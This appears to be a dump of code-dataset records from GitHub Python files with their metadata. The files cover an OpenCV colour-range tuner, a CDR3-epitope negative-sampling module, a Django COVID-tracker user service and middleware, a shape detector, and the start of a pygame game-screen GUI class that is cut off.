+{"seq_id": "28175497057", "text": "import cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('frame')\n\ncv2.createTrackbar('H_lower', 'frame', 0, 180, nothing)\ncv2.createTrackbar('S_lower', 'frame', 0, 255, nothing)\ncv2.createTrackbar('V_lower', 'frame', 0, 255, nothing)\n\ncv2.createTrackbar('H_upper', 'frame', 0, 180, nothing)\ncv2.createTrackbar('S_upper', 'frame', 0, 255, nothing)\ncv2.createTrackbar('V_upper', 'frame', 0, 255, nothing)\n\nwhile (1):\n _, frame = cap.read()\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n hl = cv2.getTrackbarPos('H_lower', 'frame')\n sl = cv2.getTrackbarPos('S_lower', 'frame')\n vl = cv2.getTrackbarPos('V_lower', 'frame')\n\n hu = cv2.getTrackbarPos('H_upper', 'frame')\n su = cv2.getTrackbarPos('S_upper', 'frame')\n vu = cv2.getTrackbarPos('V_upper', 'frame')\n\n lower_bound = np.array([hl, sl, vl])\n upper_bound = np.array([hu, su, vu])\n\n mask = cv2.inRange(hsv, lower_bound, upper_bound)\n res = cv2.bitwise_and(frame, frame, mask = mask)\n\n cv2.imshow('in', frame)\n cv2.imshow('out', res)\n cv2.imshow('mask', mask)\n\n k = cv2.waitKey(5) & 0xFF\n if k == ord('q'):\n cv2.destroyAllWindows()\n break", "repo_name": "sageshoyu/Workshop-6000-2018", "sub_path": "ImageRec/Bound_Finder.py", "file_name": "Bound_Finder.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.getTrackbarPos", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "22678471341", "text": "import gc\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom src.data.control_cdr3_source import ControlCDR3Source\n\n\ndef add_negatives(\n df: pd.DataFrame, full_dataset_path: str, epitope_ratio: bool = False\n):\n \"\"\"Generate negative CDR3-epitope pairs through shuffling and add them to the DataFrame.\n\n Parameters\n ----------\n df : DataFrame\n A DataFrame containing CDR3 and epitope sequence pairs, derived from a relevant Stream object. Should only contain positives, as a \"y\" column with 1s.\n full_dataset_path : str\n Path to the entire cdr3-epitope dataset, before splitting into folds, restricting length or downsampling. Used to avoid generating false negatives during shuffling. Should only contain positive values. Will be merged with current train/val dataframe.\n Length trimming = OK\n CV folds = not OK, in the grouped-kfold setting it does not matter, because when a certain CDR3 is paired with two different epitopes, and they end up in different folds, it's impossible for the CDR3 to be accidentally matched up to the other epitope again, because it's not available for selection. In the normal CV setting it could matter though.\n Downsampling = not OK, a CDR3 could lose representative samples of it being paired with specific epitopes, and could end up being paired with them again as false negatives during shuffling.\n MHC = OK, a few CDR3s occur for both classes, but none of the epitopes do. Consequently it's impossible for a CDR3 to be paired with an epitope that could be a false negative in the full dataset.\n TRAB = OK, none of the CDR3s are identical between TRA and TRB genes. Consequently it's impossible for a CDR3 to be paired with an epitope that could be a false negative in the full dataset.\n epitope_ratio : boolean\n When false, samples an epitope for each CDR3 sequence in the\n proportionally to its occurrence in the other epitope pairs. Does not\n preserve the ratio of positives and negatives within each epitope,\n but does result in every CDR3 sequence having exactly 1 positive and negative.\n When true, samples a set of CDR3 sequences with from the unique list of CDR3s\n for each epitope observation (per epitope), i.e. preserves exact ratio of positives and\n negatives for each epitope, at the expense of some CDR3s appearing more than once\n among the negatives and others only in positives pairs.\n\n Returns\n -------\n DataFrame\n A DataFrame with the original positive CDR3-epitope pairs, and new negative pairs created by shuffling the positive ones.\n \"\"\"\n logger = logging.getLogger(__name__)\n\n logger.info(\n f\"Generating {df.shape[0]} negatives by shuffling the positive sequence pairs.\"\n )\n logger.info(f\"Using {full_dataset_path} to avoid generating false negatives.\")\n\n # print warning and skip generation if there is only 1 epitope\n if len(df[\"antigen.epitope\"].unique()) == 1:\n logger.warning(\n \"Cannot generate negatives through shuffling when there is only 1 epitope present in a fold. Skipping generation...\"\n )\n return df\n\n # read in full dataset and remove duplicates, used to avoid generating false negatives\n full_df = pd.read_csv(\n full_dataset_path, sep=\";\", usecols=[\"cdr3\", \"antigen.epitope\"]\n )\n # merge the train/validation set with the full dataset and use this to check for false negatives\n # merging is important when the validation set is not contained in the full dataset (e.g. when using an external test set)\n full_df = (\n pd.concat([full_df, df[[\"cdr3\", \"antigen.epitope\"]]])\n .drop_duplicates()\n .reset_index(drop=True)\n )\n\n # generate negative pairs through shuffling\n if epitope_ratio:\n logger.info(\n \"Negatives will be generated by sampling CDR3 sequences for every observation with a given epitope.\"\n )\n # generate negative pairs by iterating over every sequence pair,\n # and each time match the current epitope with a randomly sampled CDR3\n # sequence from the rest of the dataset (excluding any CDR3s that are paired\n # with the current epitope as a positive example).\n np.random.seed(42)\n shuffled_df = sample_cdr3s_per_epitope(df=df, full_df=full_df)\n\n else:\n logger.info(\n \"Negatives will be generated by sampling a single epitope for each CDR3 sequence.\"\n )\n # generate negative pairs by iterating over every sequence pair,\n # and each time match the current CDR3 with a randomly sampled epitope\n # from the rest of the dataset (excluding any epitopes that are paired\n # with the current CDR3 as a positive example).\n shuffled_pairs = [\n sample_epitope_per_cdr3(\n cdr3=cdr3,\n df=df,\n full_df=full_df,\n cdr3_column=\"cdr3\",\n epitope_column=\"antigen.epitope\",\n seed=seed\n # seed=seed + 3458,\n )\n for seed, cdr3 in enumerate(df[\"cdr3\"])\n ]\n\n # convert list of tuples into dataframe and add class label\n shuffled_df = pd.DataFrame(shuffled_pairs, columns=[\"cdr3\", \"antigen.epitope\"],)\n\n # add class label to shuffled observations\n shuffled_df[\"y\"] = 0\n\n # merge with original positive data, ensuring positives are kept at the top of the dataframe\n df = df.append(shuffled_df).reset_index(drop=True)\n\n # extract duplicates\n # NOTE: because the sampling approach ensures that accidental duplicates of\n # positive pairs (i.e. false negatives) never occur, these will all be\n # accidental duplicate samples of negative pairs.\n # Therefore, keep=\"last\" is redundant, but if this was not the case,\n # it would result in only the positive examples being stored in the\n # dataframe (marking the last (=positives) as True).\n # This is kept here for historical purposes, because before the epitope\n # was supplied alongside the cdr3 in a zip operation during sample\n # generation, and the associated positive epitope was used for exclusion\n # purposes.\n # NOTE: technically not required when sampling cdr3s per epitope,\n # because in that case cdr3s are sampled without replacement from\n # a list of unique sequences.\n to_do_df = df.loc[df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")]\n # make sure all duplicates are indeed all negatives (or there are none)\n assert (\n df.loc[df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=False), \"y\"]\n .unique()\n .size\n <= 1\n )\n\n # when sampling epitopes per cdr3 (= not epitope_ratio)\n # the following steps are still required\n if not epitope_ratio:\n # remove duplicates from merged dataframe\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"],\n keep=\"first\",\n # This \"keep\" should not be required, see previous NOTE\n # always keeps the original positive examples when duplicates\n # occur across pos/neg, i.e. removes false negatives\n ).reset_index(drop=True)\n\n # remove NaN to deal with any possible universal cdr3s\n df = df.dropna(axis=0, how=\"any\", subset=[\"antigen.epitope\"])\n\n # add negatives until required amount is reached\n # add fail safe in case it is mathematically impossible to do so\n n = 0\n while to_do_df.shape[0] > 0 and not epitope_ratio:\n n += 1\n if n > 100:\n logger.warning(\n f\"Could not create negative samples for {len(to_do_df)} CDR3 sequences, likely because they had too many different binding partners. Skipping these...\"\n )\n logger.warning(to_do_df)\n break\n elif n == 50:\n logger.warning(\n f\"Could not create enough negative samples by matching every CDR3 sequence to another epitope exactly once. {len(to_do_df)} CDR3s will be sampled randomly from the positive set, leading them to be re-used and present in multiple negative pairs. Retrying this step 50 times before giving up. The CDR3s to be omitted are {to_do_df.cdr3}.\"\n )\n elif n > 50:\n # it is unlikely, but possible that certain CDR3 sequences will\n # be matched with the same epitope multiple times\n # so the sampling step is repeated 50 times.\n # if there are still duplicates after this, a warning is shown\n # and an equivalent amount of new cdr3s are randomly drawn,\n # and these are then attempted to be matched to\n # new epitopes as negatives.\n shuffled_pairs = [\n sample_epitope_per_cdr3(\n cdr3=cdr3,\n df=df,\n full_df=full_df,\n cdr3_column=\"cdr3\",\n epitope_column=\"antigen.epitope\",\n seed=n,\n )\n for cdr3 in df.loc[df[\"y\"] == 1, \"cdr3\"].sample(\n n=len(to_do_df), random_state=42 + n\n )\n ]\n\n else:\n # try to sample another epitope for the duplicate CDR3 sequences\n # i.e. those that were accidentally matched with the same epitope\n # combine the entire dataframe (current positives and negatives)\n # and use this to restrict the list of allowed epitopes\n shuffled_pairs = [\n sample_epitope_per_cdr3(\n cdr3=cdr3,\n df=df,\n full_df=full_df,\n cdr3_column=\"cdr3\",\n epitope_column=\"antigen.epitope\",\n seed=n,\n )\n for cdr3 in to_do_df[\"cdr3\"]\n ]\n shuffled_df = pd.DataFrame(\n shuffled_pairs, columns=[\"cdr3\", \"antigen.epitope\"],\n )\n shuffled_df[\"y\"] = 0\n df = df.append(shuffled_df).reset_index(drop=True)\n to_do_df = df.loc[\n df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")\n ]\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"], keep=\"first\",\n ).reset_index(drop=True)\n df = df.dropna(axis=0, how=\"any\", subset=[\"antigen.epitope\"])\n\n # assert there are no remaining duplicates and print info\n assert (\n df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"]).sum() == 0\n ), \"Found duplicate sequence pairs after shuffling to generate negatives.\"\n n_pos = np.sum(df[\"y\"] == 1)\n n_neg = np.sum(df[\"y\"] == 0)\n logger.info(\n f\"Generated {n_neg} negative sequence pairs by shuffling the {n_pos} positive pairs.\"\n )\n\n # clean up full dataset from memory\n del full_df\n full_df = \"\"\n del full_df\n gc.collect()\n\n return df\n\n\ndef sample_cdr3s_per_epitope(\n df: pd.DataFrame,\n full_df: pd.DataFrame,\n cdr3_column: str = \"cdr3\",\n epitope_column: str = \"antigen.epitope\",\n):\n \"\"\"\n Generate negative pairs by iterating over every sequence pair in the dataset,\n and each time match the current epitope with a randomly sampled CDR3\n sequence from the rest of the dataset, excluding any CDR3s that are paired\n with the current epitope as a positive example (false negatives).\n\n Preserves exact ratio of positives and negatives for each epitope,\n at the expense of some CDR3s appearing more than once among negatives, and others\n only in the positive pairs.\n\n CDR3s are sampled from the unique set of CDR3s, instead of the actual distribution.\n Should not matter in most cases since only a small minority of CDR3s occur more\n than once.\n\n NOTE: when the number of pairs for a given epitope is larger than the number\n of available unique CDR3 sequences associated with the other epitopes,\n the number of returned negatives for this epitope will be limited to this\n smaller number, causing a slight deviation from the desired per-epitope ratio.\n\n Parameters\n ----------\n df : pd.DataFrame\n A positive cdr3-epitope DataFrame with a \"cdr3\" and \"antigen.epitope\" column.\n Must have a class label column (\"y\") with \"1\" as the positive label.\n full_df : pd.DataFrame\n The entire cdr3-epitope DataFrame, before splitting into folds, restricting length or downsampling.\n Used to avoid generating false negatives. Should only contain positive values.\n cdr3_column : str\n The header for the cdr3 column in the DataFrame.\n epitope_column : str\n The header for the epitope column in the DataFrame.\n\n Returns\n -------\n pd.DataFrame\n A dataframe with negative cdr3 and epitope sequence pairs, of the same size as the input.\n \"\"\"\n logger = logging.getLogger(__name__)\n\n # full_df should only contain positive pairs, and consequently no y column should be present yet\n assert \"y\" not in full_df.columns\n\n # create list to store dataframes for every epitope\n negative_list = []\n\n # loop through every observation per epitope\n for epitope in df[epitope_column].unique():\n # extract number of required observations for current epitope\n n = df[df[epitope_column] == epitope].shape[0]\n\n # check which CDR3s occur as a positive partner for the current epitope in the full dataset\n cdr3_to_exclude = full_df.loc[(full_df[epitope_column] == epitope), cdr3_column]\n possible_cdr3 = df.loc[\n ~df[cdr3_column].isin(cdr3_to_exclude), cdr3_column\n ].unique()\n\n # check if list is empty => epitope binds to every CDR3 present\n if possible_cdr3.size == 0:\n logger = logging.getLogger(__name__)\n logger.warning(\n f\"Epitope sequence {epitope} is associated with every CDR3 sequence in the dataset and will be discarded from the negatives.\"\n )\n continue\n\n # When the number of required CDR3 sequences for the given epitope\n # is be larger than the number of available non-epitope sequence pairs\n # only sample this latter amount.\n if n > possible_cdr3.size:\n logger.warning(\n f\"Epitope sequence {epitope} requires more CDR3 sequences than the number of available unique CDR3 sequences associated with other epitopes in the provided datasets ({possible_cdr3.size}). Only this many negatives will be generated for this epitope, instead of the expected {n}.\"\n )\n n = possible_cdr3.size\n\n # sample without replacement to avoid accidental duplicates\n # among the negatives for the given epitope\n sample_df = pd.DataFrame(\n np.random.choice(possible_cdr3, size=n, replace=False),\n columns=[cdr3_column],\n )\n\n sample_df[epitope_column] = epitope\n\n negative_list.append(sample_df)\n\n negative_df = pd.concat(negative_list)\n\n return negative_df\n\n\ndef sample_epitope_per_cdr3(\n cdr3: str,\n df: pd.DataFrame,\n full_df: pd.DataFrame,\n cdr3_column: str = \"cdr3\",\n epitope_column: str = \"antigen.epitope\",\n seed: int = 42,\n) -> (str, str):\n \"\"\"Sample an epitope for the given CDR3 sequence from the pool of other epitopes in the original positive dataset.\n\n Does not preserve the ratio of positives and negatives within each epitope,\n but does result in every CDR3 sequence having exactly 1 positive and negative.\n\n NOTE: do not use a fixed random_state for the sample function, since this will result in the same epitope\n being returned every time (for cdr3s with the same original epitope).\n\n Parameters\n ----------\n cdr3 : str\n The cdr3 sequence that should be matched with a negative epitope.\n df : pd.DataFrame\n A positive cdr3-epitope DataFrame with a \"cdr3\" and \"antigen.epitope\" column.\n Must have a class label column (\"y\") with \"1\" as the positive label.\n full_df : pd.DataFrame\n The entire cdr3-epitope DataFrame, before splitting into folds, restricting length or downsampling.\n Used to avoid generating false negatives. Should only contain positive values.\n cdr3_column : str\n The header for the cdr3 column in the DataFrame.\n epitope_column : str\n The header for the epitope column in the DataFrame.\n seed : int\n Random state to use for sampling. Must be incremented upon multiple uses or the same pair\n will be drawn every time.\n\n Returns\n -------\n Tuple\n A tuple of a negative cdr3 and epitope sequence pair.\n \"\"\"\n logger = logging.getLogger(__name__)\n\n # full_df should only contain positive pairs, and consequently no y column should be present yet\n assert \"y\" not in full_df.columns\n\n # TODO: instead of having to retry matching CDR3s 50 times if they fail to match with a valid epitope\n # add the negative cdr3-epitope pairs to the epitopes_to_exclude list. Then, if the possible_epitopes\n # list is empty, this means that all epitopes in the dataset are either present in a positive example of this cdr3,\n # or a negative one, but either way the set of epitopes is excluded. Then a warning can be printed\n # and this cdr3 can be rejected. Afterwards, all rejected (nans) should be counted,\n # and the same amount of new cdr3s should be drawn again, while printing a warning that certain cdr3s are being\n # re-used in order to achieve the 50:50 pos-neg balance.\n\n # check which epitopes occur as a positive partner for the current cdr3 in the full dataset\n epitopes_to_exclude = full_df.loc[(full_df[cdr3_column] == cdr3), epitope_column]\n # epitopes_to_exclude = df.loc[\n # (df[cdr3_column] == cdr3) & (df[\"y\"] == 1), epitope_column\n # ]\n # NOTE: for this to work, the original data source should either remain unmodified (to avoid epitopes paired with\n # the cdr3 as a negative example from showing up in this list), or by making sure the class labels are 1, in which\n # case the original dataframe should be given class labels before the sample_epitope_per_cdr3 function is called for the first time.\n\n # create pd.Series with all epitopes except for those that are positive partners of the current cdr3\n\n # isin is faster even if there' just a single epitope, so use it by default\n # %timeit df[\"antigen.epitope\"].isin([\"LGYGFVNYI\"])\n # 410 µs ± 19.3 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n # %timeit df[\"antigen.epitope\"] != \"LGYGFVNYI\"\n # 1.46 ms ± 24.9 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n\n possible_epitopes = df.loc[\n ~df[epitope_column].isin(epitopes_to_exclude), epitope_column,\n ]\n\n # check if list is empty => cdr3 binds to every epitope present\n if possible_epitopes.empty:\n logger.warning(\n f\"CDR3 sequence {cdr3} is associated with every epitope in the dataset and will be discarded from the negatives.\"\n )\n return cdr3, np.NaN\n\n # sample 1 epitope from this list to pair with the cdr3 as a negative example\n # sampling should happen uniformly across all epitopes in their original distributions,\n # because the negatives should have a similar epitope distribution to the positives, i.e.\n # the list of possible epitopes should not be deduplicated or uniqued.\n else:\n sampled_epitope = possible_epitopes.sample(n=1, random_state=seed).iloc[0]\n return cdr3, sampled_epitope\n\n\ndef augment_negatives(negative_source, df, cdr3_range, amount):\n\n epitopes = (\n df.loc[df[\"y\"] == 1, \"antigen.epitope\"]\n .sample(n=amount, random_state=42)\n .reset_index(drop=True)\n )\n\n negative_source = ControlCDR3Source(\n filepath=negative_source, min_length=cdr3_range[0], max_length=cdr3_range[1],\n )\n\n cdr3 = (\n negative_source.data[negative_source.headers[\"cdr3_header\"]]\n .sample(n=amount, random_state=42)\n .reset_index(drop=True)\n .rename(\"cdr3\")\n )\n negative_df = pd.concat([cdr3, epitopes], axis=1)\n negative_df[\"y\"] = 0\n\n df = df.append(negative_df).reset_index(drop=True)\n\n to_do_df = df.loc[df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")]\n\n # remove duplicates from merged dataframe\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"], keep=\"first\",\n ).reset_index(drop=True)\n\n amount = to_do_df.shape[0]\n seed = 42\n while amount > 0:\n seed += 1\n epitopes = (\n df.loc[df[\"y\"] == 1, \"y\"]\n .sample(n=amount, random_state=seed)\n .reset_index(drop=True)\n )\n cdr3 = (\n negative_source.data[negative_source.headers[\"cdr3_header\"]]\n .sample(n=amount, random_state=seed)\n .reset_index(drop=True)\n .rename(\"cdr3\")\n )\n negative_df = pd.concat([cdr3, epitopes], axis=1)\n negative_df[\"y\"] = 0\n df = df.append(negative_df).reset_index(drop=True)\n to_do_df = df.loc[\n df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")\n ]\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"], keep=\"first\",\n ).reset_index(drop=True)\n amount = to_do_df.shape[0]\n\n return df\n\n\n# def sample_epitope_per_epitope(\n# df: pd.DataFrame,\n# full_df: pd.DataFrame,\n# cdr3_column: str = \"cdr3\",\n# epitope_column: str = \"antigen.epitope\",\n# ):\n# \"\"\"NOT USED. See second NOTE below.\n# \"\"\"\n# # full_df should only contain positive pairs, and consequently no y column should be present yet\n# assert \"y\" not in full_df.columns\n\n# # create list to store dataframes for every epitope\n# negative_list = []\n\n# # loop through every observation per epitope\n# for epitope in df[epitope_column].unique():\n# # extract number of required observations for current epitope\n# n = df[df[epitope_column] == epitope].shape[0]\n\n# # extract the CDR3 sequences paired with this epitope\n# cdr3_list = df.loc[df[epitope_column] == epitope, cdr3_column]\n\n# # check which other epitopes occur as a positive partner for all the\n# # CDR3 sequences associated with the current epitope in the full dataset\n# # NOTE: this makes the assumption that, given the followning pairs:\n# # cdr3 A - epitope 1\n# # cdr3 B - epitope 1\n# # cdr3 A - epitope 2\n# # that cdr3 B should not be matched with epitope 2, because\n# # one of its partner CDR3s that binds the same epitope (1),\n# # can bind epitope 2 as well.\n# epitopes_to_exclude = full_df.loc[\n# full_df[cdr3_column].isin(cdr3_list), epitope_column\n# ].unique()\n\n# # NOTE: don't deduplicate this list to preserve as much of the epitope distribution as possible\n# possible_epitopes = df.loc[\n# ~df[epitope_column].isin(epitopes_to_exclude), epitope_column\n# ]\n\n# # check if list is empty => epitope binds to every CDR3 present\n# if possible_epitopes.size == 0:\n# logger = logging.getLogger(__name__)\n# logger.warning(\n# f\"No epitopes found that are not bound by at least some CDR3 sequences that also bind the current epitope {epitope}. This epitope and its CDR3 sequences will be discarded from the negatives.\"\n# )\n# continue\n\n# # sample with replacement if n is be larger than the number available non-epitope sequence pairs\n# if n > possible_epitopes.size:\n# logger.warning(\n# f\"CDR3 sequences associated with {epitope} require more negative epitopes than the number of available epitopes in the provided datasets ({possible_epitopes.size}). Only this many negatives will be generated for this epitope, instead of the expected {n}.\"\n# )\n# n = possible_epitopes.size\n\n# sample_df = pd.DataFrame(\n# np.random.choice(possible_epitopes, size=n, replace=False),\n# columns=[epitope_column],\n# )\n\n# sample_df[cdr3_column] = cdr3_list\n\n# negative_list.append(sample_df)\n\n# negative_df = pd.concat(negative_list)\n\n# return negative_df\n", "repo_name": "pmoris/ImRex", "sub_path": "src/processing/negative_sampler.py", "file_name": "negative_sampler.py", "file_ext": "py", "file_size_in_byte": 24559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 218, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 233, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 234, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 275, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 296, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 322, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 329, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 330, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 405, "usage_type": "attribute"}, {"api_name": "src.data.control_cdr3_source.ControlCDR3Source", "line_number": 424, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 434, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 461, "usage_type": "call"}]}
+{"seq_id": "6673111179", "text": "from users.models import *\nfrom utils.exceptions import UserDoesNotExist\n\nclass UserService():\n\n def register_user(self, user_name, mobile, pincode, role=None):\n if role:\n user = User.objects.get_or_create(name=user_name, mobile_number=mobile, pincode=pincode, role='admin')\n else:\n user = User.objects.get_or_create(name=user_name, mobile_number=mobile, pincode=pincode)\n\n return user[0].id\n\n def record_user_assessment(self, user_id, symptoms, travel_hostory, covid_contact):\n try:\n user = User.objects.get(id=user_id)\n covid_symptom, created = UserSymptom.objects.get_or_create(user_id=user, symptoms=symptoms, travel_hostory=travel_hostory, covid_contact=covid_contact)\n covid_risk = covid_symptom.covid_risk\n return covid_risk\n except User.DoesNotExist as exec:\n raise UserDoesNotExist()\n \n def update_covid_result(self, user_id, admin_id, result):\n try:\n user = User.objects.get(id=user_id)\n admin = User.objects.get(id=admin_id)\n user_covid = CovidResult.objects.filter(user_id=user, admin_id=admin).update(covid_result=result)\n return True\n except User.DoesNotExist as exec:\n raise UserDoesNotExist()", "repo_name": "heyswatisrivastava/covid_tracker", "sub_path": "covid_tracker/users/services/user_services.py", "file_name": "user_services.py", "file_ext": "py", "file_size_in_byte": 1305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.exceptions.UserDoesNotExist", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.exceptions.UserDoesNotExist", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "2605137204", "text": "# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import redirect\n\n\nclass AuthenticationMiddleware(object):\n\n def process_request(self, request):\n if request.user.is_authenticated():\n if request.path.startswith('/login'):\n return redirect('/')\n elif request.path == '/':\n return redirect('login')\n", "repo_name": "fujimisakari/todo-server", "sub_path": "application/module/middleware.py", "file_name": "middleware.py", "file_ext": "py", "file_size_in_byte": 348, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 11, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "13760276678", "text": "import cv2\nimport numpy as np\n\nclass ShapeDetector:\n \n def __init__(self):\n pass\n \n def detect(self,c):\n # init the shape name and approximate the contour\n # Ramer-Douglas Peucker algo will be used \n shape = \"unidentified\"\n peri = cv2.arcLength(c,True)\n approx = cv2.approxPolyDP(c, .02*peri , True)\n\n print(c[1])\n # case for each shape\n\n # if triangle\n if len(approx) == 3:\n shape = \"triangle\"\n # if square or rectangle\n elif len(approx) == 4:\n #use shape factors\n # In order to determine which one we can calculate the ratio of the contours\n #figure out shape factor\n (x ,y ,w ,h) = cv2.boundingRect(approx)\n area = w*h\n areac = cv2.contourArea(approx)\n\n\n #find the greatest distance between all them points\n distance = 0\n for x in range(len(c)):\n currPoint = c[x,0]\n for y in range(len(c)):\n temp_distance = ((currPoint[0] - c[y,0,0])**2 + (currPoint[1] - c[y,0,1])**2) **.5\n if temp_distance > distance:\n distance = temp_distance\n sf = areac/(distance ** 2)\n print(sf)\n if w > h:\n aspRatio = w / float(h)\n else:\n aspRatio = float(h) / w\n\n print(aspRatio)\n if aspRatio >= .95 and aspRatio <= 1.05:\n shape = \"Square\"\n elif aspRatio >= 1.05 and aspRatio <= 1.3:\n shape = \"Rectangle\"\n elif aspRatio > 1.3:\n shape = \"Diamond\"\n else:\n shape = \"Trapezoid\"\n elif len(approx) == 5:\n shape = \"Pentagon\"\n elif len(approx) == 10:\n shape = \"Star\"\n\n elif len(approx) == 12:\n shape = \"Plus\"\n else:\n #utilize hough circle to identify circles\n shape = \"Circle\"\n return shape\n\n", "repo_name": "UCR-UAS/Payload", "sub_path": "Payload/ADLC/ShapeRecog/shapeDetector.py", "file_name": "shapeDetector.py", "file_ext": "py", "file_size_in_byte": 2039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.arcLength", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.approxPolyDP", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "27758732667", "text": "import re\nimport pygame_gui as pg_gui\nimport pygame as pg\nimport arch.gui as gui\nimport arch.game_section as gm_sect\nimport arch.model_wrap as mod_wp\nimport game_sections.pause_menu as pause_menu\nimport game_sections.end_game_screen as end_game_screen\n\n\nclass GameScreenGUI(gui.GUI):\n '''\n Class of game screen GUI\n '''\n '''\n Класс ГПИ игрового экрана\n '''\n\n def __init__(self, event_manager, visual_manager, game_section):\n '''\n Init method of the game screen GUI\n :param event_manager: event manager that will manage this\n GUI\n :param visual_manager: visual manager that will manage this\n GUI\n :param game_section: game section that owns this GUI\n '''\n '''\n Метод инициализации ГПИ игрового экрана\n :param event_manager: менеджер событий, управляющий данным\n ГПИ\n :param visual_manager: холст, на котором будет отрисован\n данный ГПИ\n :param game_section: игровая секция, к которой относится\n данный ГПИ\n '''\n\n super().__init__(event_manager, visual_manager, game_section,\n \"./assets/gui/themes/game_screen_theme.json\")\n\n def panel_init(self):\n '''\n Init method of all game screen GUI panels\n '''\n '''\n Метод инициализации всех панелей ГПИ игрового экрана\n '''\n\n shop_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(20, 220, 243, 330),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"shop-pnl\"\n )\n\n time_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(20, 20, 110, 